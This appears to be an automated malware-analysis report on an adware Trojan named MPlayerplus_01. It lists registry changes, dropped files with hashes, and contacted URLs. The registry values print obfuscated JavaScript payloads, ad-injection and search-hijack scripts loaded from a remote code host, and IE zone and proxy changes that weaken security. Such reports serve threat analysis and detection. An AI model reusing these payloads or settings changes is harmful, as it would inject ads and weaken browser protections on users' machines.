    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NzZhNTUxODFkMWQwNzMxMTMwOTRmNTk1NzUyMDExZDAzMTQ1YjRhNDIxMTAxMGExYjQ0MTY0YTAwMGUwYzBlMTYxOTAxMGQ1OTBhMDQxMTQyMTAxMzVmNTg1ZTQ3NTQ0ZTU0NWQ1NzQyNWUwMzFhNTU0ODZiNmM0ZjBiMDMwNDE5MWEyMjE2MGQ0NzU3NDM1NTE4MWQxZDA3MTc1YjRhNDIxMTAxMGExYjQ0MTY0YTAwMGUwYzBlMTYxOTAxMGQ1OTBhMDQxMTQyMTAxMzVmNTg1ZTQ3NTQ0ZTU0NWQ1NzQyNWUwMzFhNTU0ODZiNmM0ZjEzMWIwNTBlMDAxOTJkMDU0NzU3NDM0NTQxNTg0NTdkNDQ0MTQ1NGQ0MTAxMTUxYjFkMWUwNzAwMDk0ZjU5NTcyYjRiMDgxMzE3NDMzODQxNjk1NzUwNDk0OTU1MGQwZjA5MDQwZDEyM2EzYTRiNGQ0NDQzMTIwNDBkMTMxZjFlNDcyODE2MTcxZjVjNTQ0NzQwMTE1ODQ3NTA1NDQ1NTA0MzBjNTA0ZTE5MDIwNjBkMGMxZTBiMTIwMjM2MWEwMjA2MDgwMTRhNTk1NzU3MzYzNjM0MzYyZTM2M2UzMTNlMzQyYzNiMjgyODI4MjIyNTM3MjgyMzNjMmIyODJkMjUzYTMyNDQ1NzViNDk0ZTQ3NTQ1MTU1NWQ1MzQ3NDA1OTU5NDc0MzFjNWU0ZjY5MGE=', 'emcwpiiwda'); }"

    [HKCU\Software\MPlayerplus_01\Plugins\45]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEOnRequest.js"

    [HKCU\Software\MPlayerplus_01\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)0'"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,155,184,191,220,195,211,221,226,233,242,244,253,91"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\MPlayerplus_01\Plugins\47]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/resources_background.js"

    [HKCU\Software\MPlayerplus_01\Plugins\184]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/noproblemppc_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\244]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\17]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/jQuery.js"

    [HKCU\Software\MPlayerplus_01\Plugins\37]
    "Version" = "6"

    [HKCU\Software\MPlayerplus_01\Plugins\233]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3YzZhNDkxODFiMWIxODIzMDQxZjU0NTk0YjUyMDcxYjFjMDY0YzVjNTkxMTFkMGExZDQyMDk1ODE3MTgxNzBlMGExOTA3MGI0NjE4MTMwNzU5MTAwZjVmNWU1ODU4NDY1OTQyNDY1NjViNWUwNTFjNGE1YTdjN2E1NDBiMWYwNDFmMWMzZDA0MWE1MTRjNDM0OTE4MWIxYjE4MDU0YzVjNTkxMTFkMGExZDQyMDk1ODE3MTgxNzBlMGExOTA3MGI0NjE4MTMwNzU5MTAwZjVmNWU1ODU4NDY1OTQyNDY1NjViNWUwNTFjNGE1YTdjN2E1NDEzMDcwNTA4MDYwNjNmMTI1MTRjNDM1OTQzNWM0MzYyNTY1NjUzNTY0MTFkMTUxZDFiMDExNTE3MWY1NDU5NGIyYjRkMGUwYzA1NTQyZTVhNjk0YjUwNGY0ZjRhMWYxODFmMWYwZDBlM2EzYzRkNTI1NjU0MDQxZjBkMGYxZjE4NDEzNzA0MDAwOTQ3NTQ1YjQwMTc1ZTU4NDM0NjUzNGI0MzEwNTA0ODFmMWQxNDFhMWEwNTBiMGUwMjMwMWMxZDE0MWYxNzUxNTk0YjU3MzAzMDJiMjQzOTIwMjUzMTIyMzQyYTNkMzczYTNmMzQzZTM3MzQyMzNhMmQzNzNmMzIyYzI5NDQ0YjViNGY0ODU4NDY0NjQzNDY1MzViNDA1ZjVmNTg1MTBiNDg1NDY5MTY=', 'svckpoohvv'); }"

    [HKCU\Software\MPlayerplus_01\Installer]
    "Params" = "{ source_id : 001359, sub_id : 0, uzid : 0"

    [HKCU\Software\MPlayerplus_01\Plugins\220]
    "JavaScript" = "var ICMBaseManager=function(a){if(appAPI.isBackground){(function(h){var f=false,g=/xyz/.test(function(){xyz;})?/\b_super\b/:/.*/;h.Class=function(){};h.Class.extend=function(m){var l=this.prototype;f=true;var k=new this();f=false;for(var j in m){k[j]=typeof m[j]==function&&typeof l[j]==function&&g.test(m[j])?(function(n,o){return function(){var q=this._super;this._super=l[n];var p=o.apply(this,arguments);this._super=q;return p;};})(j,m[j]):m[j];}function i(){if(!f&&this.init){this.init.apply(this,arguments);}}i.prototype=k;i.prototype.constructor=i;i.extend=arguments.callee;return i;};})($jquery_171);var e={Base64:{_keyStr:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=,decode:function(h){var f=;var p,n,l;var o,m,k,j;var g=0;h=h.replace(/[^A-Za-z0-9\ \/\=]/g,);while(g>4);n=((m&15)<<4)|(k>>2);l=((k&3)<<6)|j;f='"

    [HKCU\Software\MPlayerplus_01\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "Name" = "MPlayerplus_01"

    [HKCU\Software\MPlayerplus_01\Installer]
    "Time" = "1413862412"

    [HKCU\Software\MPlayerplus_01\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\MPlayerplus_01\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\MPlayerplus_01\Plugins\221]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_downloads_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\220]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_base_m.js"

    [HKCU\Software\MPlayerplus_01\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\MPlayerplus_01\Plugins\46]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IETimers.js"

    [HKCU\Software\MPlayerplus_01\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\MPlayerplus_01\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\MPlayerplus_01\Plugins\183]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/tabsWrapper.js"

    [HKCU\Software\MPlayerplus_01\Plugins\155]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU3ZDY2NTgwYzBlMTMwNDI3MTYwMjU1NTU1YTQ2MTIxMzAwMDI1ZTQxNTgwYzE2MGYxNzA4MWE1YzA3MDExYTQwMWIwMDI5MDIwNjA0MDE0MTEwMGEwZTMwMWIwMDRiMTEwZDBhNGEzMDI1MjcyODI4MjcyMTM2MjczMzJhMjgzYjI5MzIzNjJkMmQyYTI4MzA1YzE0MTMwMzQ5MzEzNjNkMjUyYjI4NDIwZTFlMDQxNzU5MDcxOTA1MWYwNzBlNDU1ODc4NmQ0YzA3MDMwZjAzMTMwOTNkMTY0NjU0NTc1ZTRmNTE1NjZkNTQ1MjQ0NGU1NTE5MWYxNjBlMGUxNzEzMDg0YzRkNGYyMTQ2MGEwODA0MDE0NjMzN2QxMg==', 'nwozdzgtrd'); }"

    [HKCU\Software\MPlayerplus_01\Plugins\226]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId) { appAPI.internal.monetization.loader.setCampaignId(1026); }};"

    [HKCU\Software\MPlayerplus_01\Plugins\3]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_2.js"

    [HKLM\SOFTWARE\MPlayerplus_01\IE\Profiles]
    "S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\MPlayerplus_01\Plugins\221]
    "Name" = "icm_downloads_m"

    [HKCU\Software\MPlayerplus_01\Plugins\91]
    "JavaScript" = "(function(i){var l=05-08;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var t=appAPI.utils.MD5;if(!t||!t.encode){t={};t.encode=function(H){return H;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var C=appAPI.utils;var F={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.clientstaticserv.com/monetization_campaigns/,statsHostUrl:http://logs.clientstaticserv.com/monetization.gif?,errorHostUrl:http://errors.clientstaticserv.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyAppDefuI'"

    [HKCU\Software\MPlayerplus_01\Plugins\35]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEAjax.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\MPlayerplus_01\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\MPlayerplus_01\Plugins\244]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ3ODZiNTgwZjFmMTMxODI0MDUxYTUwNTg1YTQ1MDMxMzFjMDE0ZDU5NWQwNzAyMTM1YTQ5MGQxZjEwMTcxNTA3MDMwNjQ1MDQwNzFjNTgwMTFiMDYxZDAyMWY0ODAxMWYxZDEzMTExNjI1MTQxYjA2MWExYTU4MWYxYzA4MjUxNDFiMTUwMzJlMDQwMjEzMTAwZTAyMTk0OTAyMDI0ODA2MWIwNjQ3MmIzZjIyMWIzZTMzMzc0MzJkM2UzNjE4MmEwMjE2NDQzYjE4MmIwOTI5MmYwNDVjM2UyMzM3NTc1MTNlNDExODEyMGExODEzNGIyZDNkMzkzNTI0MzQzYjIzM2UzMjM3MzAyNTM0M2UyNTM3MzgzMzI5MmQ0MDU2NmQ2MjQ1MTgxZDAyMTExYjBjMzMwMzQ5NWQ0ODQzNDM0Mjc4MWY=', 'vrbzgkghqw'); }"

    [HKCU\Software\MPlayerplus_01\Plugins\21]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/debug.js"

    [HKCU\Software\MPlayerplus_01\Plugins\94]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\2]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\191]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKCU\Software\MPlayerplus_01\Plugins\35]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\MPlayerplus_01\Plugins\244]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/engageya_inner_m.js"

    [HKCU\Software\Crossrider]
    "Bic" = "EAEB041DFB674B59BB4BCF5DE150DAB5IE"

    [HKCU\Software\MPlayerplus_01\Plugins\13]
    "Version" = "7"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\MPlayerplus_01\Installer]
    "CodeDownloadDomain" = "http://js.clientstaticserv.com"

    [HKCU\Software\MPlayerplus_01\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\MPlayerplus_01\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;"

    [HKCU\Software\MPlayerplus_01\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveA'"

    [HKCU\Software\MPlayerplus_01\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\MPlayerplus_01\Plugins\233]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\64]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\38]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IECallbacks.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "PublisherId" = "21636"

    [HKCU\Software\MPlayerplus_01\Plugins\9]
    "JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url'"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_light_m.js"

    [HKLM\SOFTWARE\MPlayerplus_01\IE]
    "TotalProfiles" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process 772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "DE D2 FD 9C 6A 45 BB 67 7E 29 3F 0B A9 76 71 17"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
    "{11111111-1111-1111-1111-110511421146}" = "1"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{981FDCE3-5912-4D50-A786-2E425268440}]
    "AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-buttonutil.exe"
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{981FDCE3-5912-4D50-A786-2E425268440}]
    "AppPath" = "%Program Files%\MPlayerplus_01"

    [HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
    "{11111111-1111-1111-1111-110511421146}" = ""

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
    "AppPath" = "%Program Files%\MPlayerplus_01"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
    "AppPath" = "%Program Files%\MPlayerplus_01"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
    "AppPath" = "%Program Files%\MPlayerplus_01"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
    "AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-helper.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
    "AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-codedownloader.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
    "AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-buttonutil64.exe"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
    "Timestamp"

    The process 3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe:852 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "4F A3 6C D9 D2 D5 2F 2F FD E3 12 62 D8 26 93 1B"

    Dropped PE files

    MD5 File path
    fc3b939dc80c80895e6076f544af97fa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe
    03114dadbd9977fc823f95b21fb987e7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\GoogleUpdateOnDemand.exe
    e451d460727b0c455aed29a2e29e6bdf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\goopdate.dll
    1a6276a81911feac20613b87d29a0a57 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\goopdateres_en.dll
    109eec9108abaa66c1a67f68b6116379 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aaf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.246345\psuser.dll
    44b45aa2f17e5cef5fe5ce06d4e29128 c:\Program Files\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-2.exe
    45100a9e32472cafe3a1dba82ea01a79 c:\Program Files\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-3.exe
    2f2d67ca42e1d89fb52fee78dfb14d7f c:\Program Files\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-4.exe
    0e7dce35cf62340e570858af2257cca5 c:\Program Files\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-5.exe
    558ab1192a852c50c699e2e2b2cc293e c:\Program Files\MPlayerplus_01\MPlayerplus_01-bg.exe
    f5e9bd82988844ff01c713f737cd2aca c:\Program Files\MPlayerplus_01\MPlayerplus_01-bho.dll
    6e2aba5b014b564b51fcf02652253c95 c:\Program Files\MPlayerplus_01\MPlayerplus_01-codedownloader.exe
    b1675e8afbeb32ee818da2904328666c c:\Program Files\MPlayerplus_01\Uninstall.exe
    bc343027044449a5187452edcd9c027e c:\Program Files\MPlayerplus_01\utils.exe
    03114dadbd9977fc823f95b21fb987e7 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe
    e451d460727b0c455aed29a2e29e6bdf c:\Program Files\globalUpdate\Update\1.3.25.0\goopdate.dll
    1a6276a81911feac20613b87d29a0a57 c:\Program Files\globalUpdate\Update\1.3.25.0\goopdateres_en.dll
    109eec9108abaa66c1a67f68b6116379 c:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aaf c:\Program Files\globalUpdate\Update\1.3.25.0\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871 c:\Program Files\globalUpdate\Update\1.3.25.0\psuser.dll
    d858ba2ee718b1db1ced20646e641d08 c:\Program Files\globalUpdate\Update\GoogleUpdate.exe

    HOSTS file anomalies

    No changes have been detected.

    Rootkit activity

    No anomalies have been detected.

    Propagation

    A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

    • VersionInfo

    Company Name: Goegljtz
    Product Name: Oujmyxypscw
    Product Version:
    Legal Copyright:
    Legal Trademarks:
    Original Filename:
    Internal Name:
    File Version: 22.6.3.9
    File Description: Odyqmjhkphi
    Comments:
    Language: English (United States)

    PE Sections

    Name Virtual Address Virtual Size Raw Size Entropy Section MD5
    .text 4096 34880 35328 4.14627 8b211302c668146bb8cce549607b031f
    .data 40960 140 512 0.818128 a5a710a52d844b19513b2cab5693dbc3
    .rdata 45056 9108 9216 4.0908 004265d16597098398ce8e06897dcd29
    .bss 57344 252880 0 0 d41d8cd98f00b204e9800998ecf8427e
    .idata 311296 4868 5120 3.64756 20f692042b54593897a705a64d67ce50
    .ndata 319488 376832 8192 0 0829f71740aab1ab98b33eae21dee122
    .rsrc 696320 98304 95232 5.40652 cd8147b56e991064a2e5c04b62e8a51c

    Dropped from:

    Downloaded by:

    Similar by SSDeep:

    Similar by Lavasoft Polymorphic Checker:

    URLs

    URL IP
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=0&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1413862412&procruntime=10&rnd=1413862422
    hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de
    hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
    hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    hxxp://e6845.ce.akamaiedge.net/ThawteTimestampingCA.crl
    hxxp://e6845.ce.akamaiedge.net/tss-ca-g2.crl
    hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940
    hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638
    hxxp://cds.m9u9b7r5.hwcdn.net/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095
    hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758
    hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013
    hxxp://cds.m9u9b7r5.hwcdn.net/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q
